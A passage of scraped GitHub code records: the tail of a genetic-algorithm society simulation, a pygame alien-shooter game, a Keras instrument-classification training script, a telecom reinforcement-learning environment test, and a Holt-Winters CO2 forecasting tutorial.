int(self.invest / 20) #Each parent breeds a number of children\r\n NR_children = min( 
NR_children , 10) #Max 10 children. \r\n #print(\"NR of children born:\" , NR_children)\r\n for J in range(NR_children): #How many children do you want each pair to make\r\n \r\n #The first weights\r\n children_W, children_B = br.breed( self.CH_W[par1], self.CH_W[par2], self.CH_B[par1], self.CH_B[par2], 1, self.MUTATION_COEFF, self.H )\r\n \r\n #The second weights\r\n children_W_2, children_B_2 = br.breed( self.CH_W_2[par1], self.CH_W_2[par2], self.CH_B_2[par1], self.CH_B_2[par2], 1, self.MUTATION_COEFF, self.H2 )\r\n \r\n Survived_W.append( children_W[0] )\r\n Survived_B.append( children_B[0])\r\n \r\n Survived_W_2.append( children_W_2[0] )\r\n Survived_B_2.append( children_B_2[0] )\r\n \r\n Survived_money.append( 0 ) #All characters start with 10 credits, 0 education, 7 days worth of food and 0 fitness\r\n Survived_edu.append( 0 ) \r\n \r\n food_to_give = 20#int( self.CH_food[par1] *0.5 + self.CH_food[par2]*0.5 )\r\n #self.CH_food[par1] -= int( self.CH_food[par1] *0.5 )\r\n #self.CH_food[par2] -= int( self.CH_food[par2] *0.5 )\r\n self.CH_food[par1] -= 10\r\n self.CH_food[par2] -= 10\r\n Survived_food.append( food_to_give )\r\n #print(\"Give food for children:\", food_to_give)\r\n Survived_fitness.append( 0 )\r\n Survived_breed.append(0)\r\n Survived_age.append(0)\r\n \r\n self.total_born[-1] += 1\r\n \r\n \r\n \r\n avg_fd+=food_to_give #/ nr_children\r\n else:\r\n print(\"No children this round...\")\r\n \r\n \r\n \r\n ch_born = NR_children\r\n #maxe = max(CH_edu)\r\n maxm = 0#max(CH_money)\r\n maxf = 0#avg_fd\r\n maxfo = ch_born\r\n\r\n \r\n self.CH_W = Survived_W\r\n self.CH_B = Survived_B\r\n self.CH_W_2 = Survived_W_2\r\n self.CH_B_2 = Survived_B_2\r\n self.CH_edu = Survived_edu\r\n self.CH_age = Survived_age\r\n self.CH_money = Survived_money\r\n self.CH_food = Survived_food\r\n self.CH_fitness = Survived_fitness\r\n #print(NR_CH, \"BEFORE\")\r\n self.CH_breed = [0]*len(Survived_W)\r\n #print(len(self.CH_breed), \"AFTER\")\r\n self.hs = self.Breed_point\r\n #print(self.CH_food)\r\n #print(self.Breed_point)\r\n self.Breed_point = [0]*len(Survived_age)\r\n \r\n \r\n return Survived_W, Survived_B, Survived_money, \\\r\n Survived_edu, Survived_food, Survived_fitness, Survived_age, 0, maxm, maxf,maxfo \r\n \r\n \r\n def get_second_highest(self):\r\n a = self.Breed_point\r\n hi = mid = 0\r\n mid_pos = 0\r\n for index, x in enumerate(a):\r\n if x > hi:\r\n mid = hi\r\n hi = x\r\n mid_pos = index-1\r\n #print(mid)\r\n elif x < hi and x > mid:\r\n #lo = mid\r\n mid = x\r\n mid_pos = index\r\n #print(mid, hi, index)\r\n return mid, mid_pos\r\n \r\n #def start_game(NR_CH, H, CH_W, CH_B, MUTATION_COEFF ,TRAINING, CH_money, CH_edu, CH_food, CH_fitness, CH_breed, CH_age ):\r\n def start_game(self ):\r\n T = 1000 #timesteps\r\n MAXE=[]\r\n MAXM=[]\r\n MAXF=[]\r\n MAXFO=[]\r\n TOPOP=[len(self.CH_W)]\r\n old_nr_ch = TOPOP[0]\r\n \r\n for t in range(T):\r\n print()\r\n print(\"Time\", t)\r\n self.total_born.append(0)\r\n \r\n self.death_by_age.append(0)\r\n self.death_by_hunger.append(0)\r\n \r\n if len(self.CH_food) == 0: #Extinction\r\n print(\"Extinction\")\r\n return 0, 0, 0, 0,0,1\r\n \r\n else:\r\n \r\n #######################\r\n ##### Day choices #####\r\n #######################\r\n #CH_W, CH_B, CH_money, CH_edu, CH_food, CH_fitness, CH_age, CH_breed \\\r\n #= play_game( H, CH_W, CH_B, CH_money, CH_edu, CH_food, CH_fitness, CH_breed, CH_age, t )\r\n \r\n \r\n #print(\"BEFORE GAME:\", old_nr_ch)\r\n Survived_W, Survived_B, Survived_W_2, Survived_B_2, Survived_money,Survived_edu, 
Survived_food, Survived_fitness, Survived_age, Survived_breed = self.play_game(t)\r\n nr_ch = len(Survived_W)\r\n #print(\"AFTER GAME:\", nr_ch)\r\n #######################################\r\n ###### Adaptive fitness function ######\r\n #######################################\r\n if len(Survived_W) <= 1:\r\n print(\"EXTINCTION\")\r\n return 0, 0, 0, 0,0,1\r\n \r\n big_f = [ ]\r\n big_F = [ [] , [] ]\r\n H_act = [ \"I\" ]\r\n \r\n for i in range(nr_ch):\r\n \r\n \"Add constraints here\"\r\n #self.CH_B_3[0][0][0][0] = 0\r\n \r\n '''Here we create the fitness output using the fitness function'''\r\n X = np.array([ [ Survived_money[i] ], [ Survived_food[i] ], [ Survived_fitness[i] ], [ Survived_edu[i] ] ,[ Survived_age[i] ], [0] ]) #0 is placeholder\r\n \r\n\r\n \r\n f,F = nd.feedforward(1, X , self.H_3, self.CH_W_3, self.CH_B_3,0, H_act)\r\n \r\n \r\n big_f.append(f)\r\n big_F[0].append(F[0])\r\n big_F[1].append(F[1])\r\n \r\n max_ch = max(nr_ch , old_nr_ch )\r\n min_ch = min(nr_ch , old_nr_ch )\r\n if old_nr_ch > nr_ch: #Some people died\r\n \"Add zeros to current fitness stats\"\r\n for k in range( old_nr_ch - nr_ch ):\r\n #print(\"here\")\r\n big_f.append([ np.zeros((6,1)) , np.zeros((1,1)) ]) # Add zeros here for dead or newborn entries ###\r\n big_F[0].append( np.zeros((6,1)) )\r\n big_F[1].append( np.zeros((1,1)) )\r\n \r\n if old_nr_ch <= nr_ch:\r\n \"Add zeros to previous fitness stats\"\r\n for k in range( nr_ch - old_nr_ch ):\r\n self.Fitness_old.append(0)\r\n #print(\"in here\")\r\n \r\n ''' End fitness forward function '''\r\n \r\n ''' Start fitness backward '''\r\n #Add zero entries for fallen/added people\r\n \r\n big_F0 = np.array(big_F[0]).T\r\n big_F0 = np.reshape(big_F0, (6,max_ch) ) #The input stats\r\n big_F1 = np.reshape( np.array(big_F[1]).T , (1,max_ch) ) #The output fitness\r\n \r\n new_f = [ np.reshape(big_f, (1,max_ch)) ] #Pre act of fitness\r\n new_F = [ big_F0 , big_F1 ] #post act\r\n \r\n \r\n Fitness_cost = [ self.Fitness_old , np.array(big_F1) ] #Fitness_old may have more entries than big_F1\r\n # due to deaths\r\n #print(nr_ch,old_nr_ch, np.shape(big_F1) , np.shape(self.Fitness_old) )\r\n \r\n \r\n self.Fitness_old = [big_F1[0,l] for l in range( len(Survived_W) ) ]\r\n \r\n \r\n \r\n \"Update fitness function\"\r\n self.CH_W_3, self.CH_B_3, _ = \\\r\n nd_F.backpropagation(self.H_3, new_F, new_f, np.ones((1,max_ch)) , self.CH_W_3, self.CH_B_3,lr=0.01,H_act=H_act,delta_class='', F=Fitness_cost, COST='fit')\r\n \r\n ''' Weights in self.CH_W_3 represents importance of stats in X\r\n '''\r\n \r\n ##################################\r\n ###### End fitness function ######\r\n ##################################\r\n old_nr_ch = nr_ch\r\n self.breed_selector(Survived_W, Survived_B, Survived_W_2, Survived_B_2, Survived_money,Survived_edu, Survived_food, Survived_fitness, Survived_age, Survived_breed)\r\n \r\n \r\n self.TOPOP.append(len(self.CH_food))\r\n self.MAXE.append(max(self.CH_edu))\r\n self.MAXM.append(max(self.CH_money))\r\n #MAXF.append(max(self.CH_food))\r\n self.MAXFO.append(max(self.CH_food))\r\n self.avg_age.append( np.average(self.CH_age) )\r\n \r\n #CH_breed = [0]*len(CH_edu) #Number of characters\r\n\r\n \r\n return MAXE,MAXM,MAXF,MAXFO, TOPOP, 0\r\n\r\n#if restart == True:\r\n# CH_W, CH_B, CH_money, CH_edu, CH_food, CH_fitness, CH_breed, CH_age = define_char(H, NR_CH)\r\n# CH_W_2, CH_B_2, _, _, _, _, _, _ = define_char(H2, NR_CH, CH_W = [], CH_B = [], CH_money = [],\r\n# CH_edu = [], CH_food = [], CH_fitness = [], CH_breed = [], CH_age=[])\r\n\r\n
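# NOTE: network shapes, summarized from the class above: H is the per-day\r\n# action net (5 stats plus 6 tanh-squashed fitness weights in, 5 actions out),\r\n# H2 is the mate-choice net, and H_3 = [6, 1] is the adaptive fitness net\r\n# whose weights are fed back into each character's input vector.\r\n\r\n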
TRAINING = True\r\nNR_CH = 100\r\nMUTATION_COEFF = 0.001\r\n\r\nInput = 5 #edu, money, food, invest, age\r\nOutput = 5 #school, work, buy food, breed, invest\r\nnr_stats_prio = 6\r\nH = [Input + nr_stats_prio, 20,Output] # 11 inputs, one hidden layer of 20, 5 outputs\r\n\r\nInput_2 = 3\r\nOutput_2 = 1 #Choose whom to breed with, using the same input except age\r\nH2 = [Input_2,40,Output_2]\r\n\r\nrestart = True\r\n\r\ns = Genetic( H, H2, NR_CH, MUTATION_COEFF, TRAINING )\r\ns.start_game()\r\n\r\n\r\n\r\nend = time.time()\r\nprint(end - start)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Simonws92/Code","sub_path":"Genetic/Society/Society_main.py","file_name":"Society_main.py","file_ext":"py","file_size_in_byte":24291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"4663474392","text":"#!/usr/bin/env python3\n\nimport random\n\nfrom project.utils import *\nfrom project.HCSR04 import Sensor\nfrom project.constants import *\nfrom project.components.vaisseau import Vaisseau, Tir\nfrom project.components.alien import Alien\nfrom project.components.explosion import Explosion\nfrom project.components.score import Score\nfrom project.components.background import Background\n\n# see if we can load more than standard BMP\nif not pygame.image.get_extended():\n raise SystemExit(\"Sorry, extended image module required\")\n\n\nmain_dir = os.path.split(os.path.abspath(__file__))[0]\n\n\ndef images():\n \"\"\"\n This method loads the images and assigns them to the game elements that need them\n :return: None\n \"\"\"\n s = load_image('lololol.gif') # from the utils.py file\n Vaisseau.image = pygame.transform.scale(s, (50, 50))\n img = load_image('explosion1.gif')\n Explosion.images = [img, pygame.transform.flip(img, 1, 1)]\n Alien.images = load_images('coucou2.gif')\n t = load_image('pokeball.gif')\n Tir.image = pygame.transform.scale(t, (50, 50))\n Background.image = load_image('background.jpeg')\n\n\ndef fenetre():\n \"\"\"\n This method sets up the game window: we pick a title and an icon, and decide whether\n the mouse cursor should be visible\n :return: None\n \"\"\"\n icon = pygame.transform.scale(Alien.images[0], (32, 32)) # Use the alien image and resize it\n pygame.display.set_icon(icon) # Set the icon\n pygame.display.set_caption('Pygame Aliens') # Set the title\n pygame.mouse.set_visible(0) # Hide the mouse cursor\n\n\ndef sons():\n \"\"\"\n This method loads the game sounds and starts the main music\n :return: boom_sound, shoot_sound => the explosion and shooting sounds\n \"\"\"\n boom_sound = load_sound('boom.wav') # Use the load_sound helper defined in utils.py\n shoot_sound = load_sound('car_door.wav')\n if pygame.mixer and SONS:\n music = os.path.join(main_dir, 'src/sound', 'house_lo.wav')\n pygame.mixer.music.load(music)\n pygame.mixer.music.play(-1)\n\n return boom_sound, shoot_sound\n\n\ndef main():\n \"\"\"\n Main function, called when the script is executed\n :return: None\n \"\"\"\n # Initialize pygame\n if pygame.get_sdl_version()[0] == 2:\n pygame.mixer.pre_init(44100, 32, 2, 1024)\n pygame.init()\n if pygame.mixer and not pygame.mixer.get_init():\n print('Warning, no sound')\n pygame.mixer = None\n\n # Set the window mode\n winstyle = 0 # FULLSCREEN\n bestdepth = pygame.display.mode_ok(ECRAN.size, winstyle, 32)\n screen = pygame.display.set_mode(ECRAN.size, winstyle, bestdepth)\n\n # Load the images and assign them to the classes\n images()\n\n 
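# NOTE: images() above stores the loaded surfaces on *class* attributes\n # (e.g. Vaisseau.image), so every sprite instance created later shares the\n # same pre-scaled surface instead of reloading it from disk.\n 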
# Set up the window\n fenetre()\n boom_sound, shoot_sound = sons()\n #sensor = Sensor()\n\n # Create the game groups (a bit magic: these are lists that keep track of the different\n # elements that will be created, and that register them automatically on creation)\n aliens = pygame.sprite.Group()\n shots = pygame.sprite.Group()\n all = pygame.sprite.RenderUpdates()\n lastalien = pygame.sprite.GroupSingle()\n back = pygame.sprite.RenderUpdates()\n\n # Assign to each class its corresponding group(s)\n #Background.containers = all\n Background.containers = back\n Vaisseau.containers = all\n Alien.containers = aliens, all, lastalien\n Tir.containers = shots, all\n Explosion.containers = all\n Score.containers = all\n\n # Define a few starting values\n alien_suivant = NOUVEL_ALIEN\n clock = pygame.time.Clock()\n\n # Initialize the game elements; we do not always need to keep a reference thanks to the\n # containers, which take care of collecting them on creation (more details in the\n # individual elements)\n #Background(0) # Create two background images, one after the other, so that at least\n #Background(Background.image.get_width()) # one of them is always visible to the user\n \n Background(0)\n player = Vaisseau() # Create the player; keep a reference so we can apply actions to it\n score = Score() # Create the score; keep a reference so we can update it\n Alien() # Create a first alien\n # The game really starts here; this loop defines the whole game mechanics\n while player.alive():\n \n\n # get input\n for event in pygame.event.get():\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\n return\n\n keystate = pygame.key.get_pressed()\n\n # Clear the screen contents\n all.clear(screen, pygame.Surface(ECRAN.size))\n\n # Update all the elements\n all.update()\n\n # React to the player's actions\n #dirx = keystate[pygame.K_RIGHT] - keystate[pygame.K_LEFT]\n #diry = keystate[pygame.K_DOWN] - keystate[pygame.K_UP]\n #player.move((dirx, diry))\n if keystate[pygame.K_UP]:\n player.move((0,1))\n if keystate[pygame.K_DOWN]:\n player.move((0,-1))\n if keystate[pygame.K_RIGHT]:\n player.move((1,0))\n if keystate[pygame.K_LEFT]:\n player.move((-1,0))\n firing = keystate[pygame.K_SPACE]\n if not player.reloading and firing and len(shots) < MAX_TIRS:\n Tir(player.gunpos())\n if SONS:\n shoot_sound.play()\n player.reloading = firing\n\n # (Possibly) create a new alien\n if alien_suivant > 0:\n alien_suivant = alien_suivant - 1\n elif len(aliens) <= MAX_ALIEN and not int(random.random() * PROBA_ALIEN):\n Alien()\n alien_suivant = NOUVEL_ALIEN\n\n # Collision detection\n for alien in pygame.sprite.spritecollide(player, aliens, 1):\n if SONS:\n boom_sound.play()\n Explosion(alien)\n Explosion(player)\n score.point()\n player.kill()\n\n for alien in pygame.sprite.groupcollide(shots, aliens, 1, 1).keys():\n if SONS:\n boom_sound.play()\n Explosion(alien)\n score.point()\n\n # Draw the elements\n dirty = back.draw(screen)\n pygame.display.update(dirty)\n dirty = all.draw(screen)\n pygame.display.update(dirty)\n\n # Set the window refresh rate\n clock.tick(30) # The window will never refresh more than 30 times per second\n\n # The game is over; print the final score to the terminal\n print(\"Final score = \" + 
str(score.score()))\n\n pygame.quit()\n\n\n# call the main function when the script is executed\nif __name__ == '__main__':\n main()\n","repo_name":"geverartsdev/TechnofuturTIC","sub_path":"Flo et toto/POKEMON/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"44363788422","text":"\"\"\"\nTrains an ML model, makes predictions on the data and evaluates it.\n\"\"\"\n\nimport arrow\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom keras.utils import np_utils\nimport numpy as np\nimport os\nimport pandas as pd\nimport random\nimport shutil\nfrom sklearn.metrics import roc_auc_score\n\nfrom capture import CaptureStdout\nfrom evaluate import evaluate_model\nfrom model_arch import create_model\nfrom prepare_training_data import load_data\n\ndef train_model(model, x, y, ix, model_dir, evaluation_dir,\n batch_size=32, epoch_count=30, enable_tensorboard=False):\n with open(model_dir + '/model_arch.yaml', 'w') as f:\n f.write(model.to_yaml())\n\n with open(model_dir + '/model_summary.txt', 'w') as f:\n with CaptureStdout() as output:\n model.summary()\n f.write(str(output))\n\n callbacks = []\n\n # TODO: Better save the whole model with weights.\n # It can then be loaded at once, including compilation.\n callbacks.append(ModelCheckpoint(model_dir + '/model_weights.h5',\n monitor='val_loss', verbose=1,\n save_best_only=True, save_weights_only=True,\n mode='auto'))\n\n if enable_tensorboard:\n callbacks.append(TensorBoard(log_dir=model_dir + '/tensorboard',\n histogram_freq=1))\n\n training_hist = model.fit(\n x[ix['train']], y[ix['train']],\n validation_data=(x[ix['valid']], y[ix['valid']]),\n batch_size=batch_size, nb_epoch=epoch_count,\n callbacks=callbacks,\n verbose=1)\n\n store_learning_curves(training_hist, evaluation_dir)\n\n return model\n\n\ndef predict(model, x, y, ix, output_dir):\n \"\"\"\n Store predictions in a CSV file and predicted probabilities in an NPZ file.\n \"\"\"\n\n y_proba_pred = model.predict(x)\n np.savez_compressed(output_dir + '/predictions_proba.npz',\n y_proba_pred=y_proba_pred)\n\n df = pd.DataFrame({\n 'y_pred': np_utils.probas_to_classes(y_proba_pred),\n 'y_true': np_utils.categorical_probas_to_classes(y)})\n\n df['accurate'] = df['y_true'] == df['y_pred']\n\n df['split'] = ''\n for key, indexes in ix.items():\n df.ix[indexes, 'split'] = key\n\n df = df[['split', 'y_true', 'y_pred', 'accurate']]\n\n df.to_csv(output_dir + '/predictions.csv', index=None)\n\n return y_proba_pred\n\n\ndef compute_final_metrics(model, x, y, ix, y_proba_pred, evaluation_dir):\n splits = ['train', 'valid', 'test']\n metrics = pd.DataFrame([\n model.evaluate(x[ix[split]], y[ix[split]], verbose=0)\n for split in splits\n ],\n columns=model.metrics_names,\n index=splits)\n metrics.index.name = 'split'\n metrics['error'] = 1.0 - metrics['acc']\n metrics['count'] = [len(ix[split]) for split in splits]\n metrics['abs_error'] = (metrics['error'] * metrics['count']).astype(int)\n\n metrics['auc'] = [roc_auc_score(y[ix[split]], y_proba_pred[ix[split]])\n for split in splits]\n\n print(metrics)\n metrics.to_csv(evaluation_dir + '/final_metrics.csv', float_format='%.5f')\n\n\ndef store_learning_curves(training_hist, evaluation_dir):\n df = pd.DataFrame(training_hist.history)\n df.rename(columns={\n 'acc': 'train_acc', 'loss': 'train_loss',\n 'val_acc': 'valid_acc', 'val_loss': 'valid_loss'\n }, inplace=True)\n df['train_error'] = 1.0 - 
df['train_acc']\n df['valid_error'] = 1.0 - df['valid_acc']\n df.to_csv(evaluation_dir + '/learning_curves.csv', index=None)\n\n\ndef prepare_dirs(dirs):\n for d in dirs:\n os.makedirs(d, exist_ok=True)\n\n\ndef store_model_files(input_dir, model_dir):\n shutil.copy(\n input_dir + '/preproc_transformers.json',\n model_dir + '/preproc_transformers.json')\n shutil.copy('model_arch.py', model_dir + '/model_arch.py')\n\ndef generate_model_id():\n \"\"\"\n Returns a model id based on timestamp with some random part to prevent potential collisions.\n \"\"\"\n date_part = arrow.utcnow().format('YYYY-MM-DD_HH-mm-ss')\n random_part = random.randint(0, 2<<31)\n return '%s_%x' % (date_part, random_part)\n\nif __name__ == '__main__':\n model_id = generate_model_id()\n print('model id:', model_id)\n\n base_dir = 'data/working/single-notes-2000'\n input_dir = base_dir + '/features-04-unscaled/training-data'\n model_dir = base_dir + '/models/' + model_id\n output_dir = model_dir + '/output-data'\n evaluation_dir = model_dir + '/evaluation'\n\n prepare_dirs([input_dir, model_dir, output_dir, evaluation_dir])\n\n store_model_files(input_dir, model_dir)\n\n x, y, ix = load_data(input_dir)\n\n model = create_model(input_shape=x.shape[1:], class_count=y.shape[1])\n model.summary()\n model = train_model(model,\n x, y, ix,\n model_dir, evaluation_dir,\n epoch_count=30)\n\n y_proba_pred = predict(model, x, y, ix, output_dir)\n\n compute_final_metrics(model, x, y, ix, y_proba_pred, evaluation_dir)\n\n evaluate_model(input_dir, model_dir)\n","repo_name":"bzamecnik/ml","sub_path":"instrument-classification/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"67"} +{"seq_id":"72802072214","text":"'''\nUFPA - LASSE - Telecommunications, Automation and Electronics Research and Development Center - www.lasse.ufpa.br\nCAVIAR - Communication Networks and Artificial Intelligence Immersed in Virtual or Augmented Reality\nAilton Oliveira, Felipe Bastos, João Borges, Emerson Oliveira, Daniel Takashi, Lucas Matni, Rebecca Aben-Athar, Aldebaro Klautau (UFPA): aldebaro@ufpa.br\nCAVIAR: https://github.com/lasseufpa/ITU-Challenge-ML5G-PHY-RL.git\n\nScript to test telecommunications dynamics/environment\nV1.0\n'''\n\nimport numpy as np\nfrom communications.buffer import Buffer\nfrom communications.base_station import BaseStation\nfrom communications.ue import UE\n\nuse_airsim = False\nobj_type = 'UAV'\n\n# Test integration\nprint('/////////////// Test integration ///////////////')\nepisode = [0,1]\n#episode = [0]\nue1 = UE(name='uav1', obj_type=obj_type, total_number_rbs=17, episode=episode, use_airsim=use_airsim)\nue2 = UE(name='simulation_car1', obj_type=obj_type, total_number_rbs=17, episode=episode, use_airsim=use_airsim)\nue3 = UE(name='simulation_pedestrian1', obj_type=obj_type, total_number_rbs=17, episode=episode, use_airsim=use_airsim)\ncaviar_bs = BaseStation(Elements=64, frequency=60e9,name='BS1',ep_lenght=20, traffic_type='light', BS_type = 'UPA')\n#Append users\ncaviar_bs.append(ue1)\ncaviar_bs.append(ue2)\ncaviar_bs.append(ue3)\n\nuser = -1\naction = 32\n\nfor i in range(20):\n\tif user == 2:\n\t\tuser = -1\n\tuser += 1\n\tstate, reward, feedback ,done = caviar_bs.step(user,action)\n\tprint('User ID: ', caviar_bs.UEs[user].ID, 'Buffer: ', caviar_bs.UEs[user].buffer, 'BS TYPE: ', 
caviar_bs._type)\n\tprint('###')\n\n","repo_name":"lasseufpa/ITU-Challenge-ML5G-PHY-RL","sub_path":"test_communications.py","file_name":"test_communications.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"67"} +{"seq_id":"4407039456","text":"##################################################\n# Smoothing Methods (Holt-Winters)\n##################################################\n\nimport itertools\nimport warnings\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nfrom sklearn.metrics import mean_absolute_error\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing # holtwinters\nfrom statsmodels.tsa.holtwinters import SimpleExpSmoothing\nfrom statsmodels.tsa.seasonal import seasonal_decompose # to split the time series into its components\nimport statsmodels.tsa.api as smt\n\nwarnings.filterwarnings('ignore')\n\n\n############################\n# Dataset\n############################\n\n# Atmospheric CO2 from Continuous Air Samples at Mauna Loa Observatory, Hawaii, U.S.A.\n# Period of Record: March 1958 - December 2001\n\ndata = sm.datasets.co2.load_pandas() # WEEKLY CO2 EMISSIONS DATASET\ny = data.data\n\ny = y['co2'].resample('MS').mean() # TO OBSERVE BY MONTH RATHER THAN BY WEEK\n\ny.isnull().sum() # NULL VALUES\n\ny = y.fillna(y.bfill()) # INSTEAD OF MODE/MEDIAN, GAPS ARE FILLED FROM A NEIGHBORING OBSERVATION (BACKFILL USES THE NEXT ONE)\n\ny.plot(figsize=(15, 6))\nplt.show()\n\n\n############################\n# Holdout\n############################\n\ntrain = y[:'1997-12-01'] # TAKE THE DATA UP TO THE END OF 1997 AS TRAIN\nlen(train) # 478 months\n\n# Test set from the first month of 1998 to the end of 2001.\ntest = y['1998-01-01':] # TEST SET FROM THE FIRST MONTH OF 1998 ONWARD\nlen(test) # 48 months\n\n##################################################\n# Structural Analysis of the Time Series\n##################################################\n\n# Stationarity Test (Dickey-Fuller Test)\n\ndef is_stationary(y):\n\n # \"H0: Non-stationary\" # IF THE P-VALUE IS BELOW 0.05, H0 IS REJECTED\n # \"H1: Stationary\"\n\n p_value = sm.tsa.stattools.adfuller(y)[1]\n if p_value < 0.05:\n print(F\"Result: Stationary (H0: non-stationary, p-value: {round(p_value, 3)})\")\n else:\n print(F\"Result: Non-Stationary (H0: non-stationary, p-value: {round(p_value, 3)})\")\n\nis_stationary(y)\n\n# Time Series Components and Stationarity Test # FUNCTION TO INSPECT THE LEVEL, TREND, SEASONAL AND RESIDUAL COMPONENTS\ndef ts_decompose(y, model=\"additive\", stationary=False):\n result = seasonal_decompose(y, model=model)\n fig, axes = plt.subplots(4, 1, sharex=True, sharey=False)\n fig.set_figheight(10)\n fig.set_figwidth(15)\n\n axes[0].set_title(\"Decomposition for \" + model + \" model\")\n axes[0].plot(y, 'k', label='Original ' + model)\n axes[0].legend(loc='upper left')\n\n axes[1].plot(result.trend, label='Trend')\n axes[1].legend(loc='upper left')\n\n axes[2].plot(result.seasonal, 'g', label='Seasonality & Mean: ' + str(round(result.seasonal.mean(), 4)))\n axes[2].legend(loc='upper left')\n\n axes[3].plot(result.resid, 'r', label='Residuals & Mean: ' + str(round(result.resid.mean(), 4)))\n axes[3].legend(loc='upper left')\n plt.show(block=True)\n\n if stationary:\n is_stationary(y)\n\nts_decompose(y, stationary=True)\n\n\n##################################################\n# Single Exponential Smoothing\n##################################################\n\n# SES MODELS THE LEVEL ONLY\n\n
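# (Editor's addition, a minimal sketch:) before fitting anything, a naive last-value baseline\n# gives a yardstick MAE that SES should beat.\nnaive_pred = pd.Series(train.iloc[-1], index=test.index)\nprint(\"Naive baseline MAE:\", mean_absolute_error(test, naive_pred))\n\n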
ses_model = SimpleExpSmoothing(train).fit(smoothing_level=0.5) # FIT ON THE TRAIN SET; ALPHA IS THE HYPERPARAMETER\n\ny_pred = ses_model.forecast(48) # HERE forecast IS USED INSTEAD OF predict\n\nmean_absolute_error(test, y_pred) # THE ERROR IS MEASURED FROM THE DIFFERENCES BETWEEN PREDICTIONS AND ACTUAL VALUES.\n\ntrain.plot(title=\"Single Exponential Smoothing\") # VISUALIZATION OF THE MODEL FORECAST AGAINST THE TEST RESULTS\ntest.plot()\ny_pred.plot()\nplt.show()\n\n\ntrain[\"1985\":].plot(title=\"Single Exponential Smoothing\")\ntest.plot()\ny_pred.plot()\nplt.show()\n\n\ndef plot_co2(train, test, y_pred, title): # VISUALIZATION OF PREDICTIONS VS TEST DATA ON THE CO2 DATASET\n mae = mean_absolute_error(test, y_pred)\n train[\"1985\":].plot(legend=True, label=\"TRAIN\", title=f\"{title}, MAE: {round(mae,2)}\")\n test.plot(legend=True, label=\"TEST\", figsize=(6, 4))\n y_pred.plot(legend=True, label=\"PREDICTION\")\n plt.show()\n\nplot_co2(train, test, y_pred, \"Single Exponential Smoothing\")\n\nses_model.params # SMOOTHING_LEVEL 0.5 IS THE ALPHA PARAMETER\n\n############################\n# Hyperparameter Optimization\n############################\n\ndef ses_optimizer(train, alphas, step=48):\n\n best_alpha, best_mae = None, float(\"inf\")\n\n for alpha in alphas:\n ses_model = SimpleExpSmoothing(train).fit(smoothing_level=alpha)\n y_pred = ses_model.forecast(step)\n mae = mean_absolute_error(test, y_pred)\n\n if mae < best_mae:\n best_alpha, best_mae = alpha, mae\n\n print(\"alpha:\", round(alpha, 2), \"mae:\", round(mae, 4))\n print(\"best_alpha:\", round(best_alpha, 2), \"best_mae:\", round(best_mae, 4))\n return best_alpha, best_mae\n\nalphas = np.arange(0.8, 1, 0.01) # SES IS A WEAK MODEL, SO THE LEARNING PARAMETER IS KEPT HIGH, FAVORING RECENT VALUES OVER MEMORY\n\n# y_hat(t) = a * y(t-1) + (1 - a) * y_hat(t-1)\n\nses_optimizer(train, alphas) # BEST ALPHA 0.99\n\nbest_alpha, best_mae = ses_optimizer(train, alphas)\n\n############################\n# Final SES Model\n############################\n\nses_model = SimpleExpSmoothing(train).fit(smoothing_level=best_alpha) # FINAL SES MODEL\ny_pred = ses_model.forecast(48) # FORECAST 48 STEPS AHEAD.\n\nplot_co2(train, test, y_pred, \"Single Exponential Smoothing\") # GIVEN\n\n\n##################################################\n# Double Exponential Smoothing (DES)\n##################################################\n\n# DES: Level (SES) + Trend\n\n
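# (Editor's note, added:) Holt's linear method keeps two states, a level l(t) and a trend b(t):\n#   l(t) = alpha * y(t) + (1 - alpha) * (l(t-1) + b(t-1))\n#   b(t) = beta * (l(t) - l(t-1)) + (1 - beta) * b(t-1)\n# and forecasts h steps ahead with y_hat(t+h) = l(t) + h * b(t).\n\n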
#!!!!!!!!!!!!!!!!!! IF THE SEASONAL AND RESIDUAL COMPONENTS IN THE PLOT DO NOT SCALE WITH THE TREND, THE SERIES IS ADDITIVE.\n\n# y(t) = Level + Trend + Seasonality + Noise # ADDITIVE\n# y(t) = Level * Trend * Seasonality * Noise # MULTIPLICATIVE\n\n# TRY BOTH 'mul' AND 'add' AND KEEP WHICHEVER GIVES THE LOWER ERROR.\n\nts_decompose(y) # --> ADDITIVE\n\ndes_model = ExponentialSmoothing(train, trend=\"add\").fit(smoothing_level=0.5,\n smoothing_trend=0.5)\n\ny_pred = des_model.forecast(48)\n\nplot_co2(train, test, y_pred, \"Double Exponential Smoothing\")\n\n############################\n# Hyperparameter Optimization\n############################\n\n\ndef des_optimizer(train, alphas, betas, step=48): # DES FUNCTION USED FOR HYPERPARAMETER OPTIMIZATION\n best_alpha, best_beta, best_mae = None, None, float(\"inf\")\n for alpha in alphas:\n for beta in betas:\n des_model = ExponentialSmoothing(train, trend=\"add\").fit(smoothing_level=alpha, smoothing_slope=beta)\n y_pred = des_model.forecast(step)\n mae = mean_absolute_error(test, y_pred)\n if mae < best_mae:\n best_alpha, best_beta, best_mae = alpha, beta, mae\n print(\"alpha:\", round(alpha, 2), \"beta:\", round(beta, 2), \"mae:\", round(mae, 4))\n print(\"best_alpha:\", round(best_alpha, 2), \"best_beta:\", round(best_beta, 2), \"best_mae:\", round(best_mae, 4))\n return best_alpha, best_beta, best_mae\n# IN DES WE SEARCH FOR BOTH ALPHA AND BETA.\n\nalphas = np.arange(0.01, 1, 0.10) # RANGE TO SWEEP FOR ALPHA\nbetas = np.arange(0.01, 1, 0.10) # RANGE TO SWEEP FOR BETA\n\nbest_alpha, best_beta, best_mae = des_optimizer(train, alphas, betas) # BEST VALUES.\n\n\n\n\n############################\n# Final DES Model\n############################\n\nfinal_des_model = ExponentialSmoothing(train, 